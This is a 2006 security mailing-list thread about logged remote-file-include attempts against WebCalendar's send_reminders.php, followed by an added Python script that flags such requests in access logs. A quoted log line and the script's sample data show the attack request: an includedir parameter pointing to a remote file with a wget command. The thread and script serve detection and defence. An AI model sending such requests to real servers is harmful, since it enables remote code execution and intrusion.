[Dshield] Webcal Exploit?

George A. Theall theall at tifaware.com
Tue Feb 7 20:01:12 GMT 2006


On Tue, Feb 07, 2006 at 11:34:16AM -0500, David Cary Hart wrote:
> On Mon, 06 Feb 2006 17:52:38 -0600
> Frank Knobbe <frank at knobbe.us> opined:
> > On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > > > 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> > > > http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > > > HTTP/1.0" 302 290
> > > 
> > > Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
> > > August:
> > 
> > I see your August and raise you March. Seems like we had a BleedingSnort
> > rule for this at least since March 2005.
> > http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/WEB/WEB_PHP_Injection?view=markup
> > 
> > Thanks for the BID reference, I'll add that shortly to the sig.
> > 
> I'm still getting quite a few of these. Perhaps there is a new
> exploit???

No.  Take a look at the BID or the Nessus plugin -- you can include
files remotely through the 'includedir' parameter of
'tools/send_reminders.php', which is what your logs show the attackers 
trying to do.

George
-- 
theall at tifaware.com
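
Added example, not part of the original message and not the Nessus plugin or BleedingSnort rule mentioned in the thread: a Python check that scans access-log lines for the pattern described above, a remote URL passed in the 'includedir' parameter of 'tools/send_reminders.php'. The sample lines, addresses and domains are constructed, and the log regex assumes Apache common/combined log format.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) \S+')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)
SCRIPT = "/tools/send_reminders.php"

# Constructed sample lines (documentation addresses and domains, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Feb/2006:12:36:47 -0500] "GET /Webcal42/tools/'
    'send_reminders.php?includedir=http://files.example/inc.gif?&cmd=wget HTTP/1.0" 302 290',
    # Proxy-style absolute URL with a percent-encoded parameter value.
    '203.0.113.9 - - [05/Feb/2006:13:01:02 -0500] "GET http://www.example.org/webcal/tools/'
    'send_reminders.php?includedir=http%3A%2F%2Ffiles.example%2Finc.gif%3F HTTP/1.0" 404 210',
    # Same script, local value: not a remote include.
    '192.0.2.15 - - [05/Feb/2006:13:05:40 -0500] "GET /webcal/tools/'
    'send_reminders.php?includedir=includes HTTP/1.1" 200 512',
    # Unrelated page.
    '192.0.2.15 - - [05/Feb/2006:13:06:11 -0500] "GET /webcal/month.php?date=20060205 HTTP/1.1" 200 8121',
]


def find_remote_includes(lines):
    """Return one dict per request that passes a remote URL in 'includedir'."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)  # handles /path and proxy-style http://host/path
        if not parts.path.lower().endswith(SCRIPT):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value).strip()  # parse_qsl decoded once; undo a second layer
            if name == "includedir" and REMOTE_RE.match(value):
                hits.append({"client": client, "time": when,
                             "status": int(status), "includedir": value})
    return hits


if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["status"], hit["includedir"])
```

The status field is kept in each hit so that responses can be sorted by how the server answered when triaging.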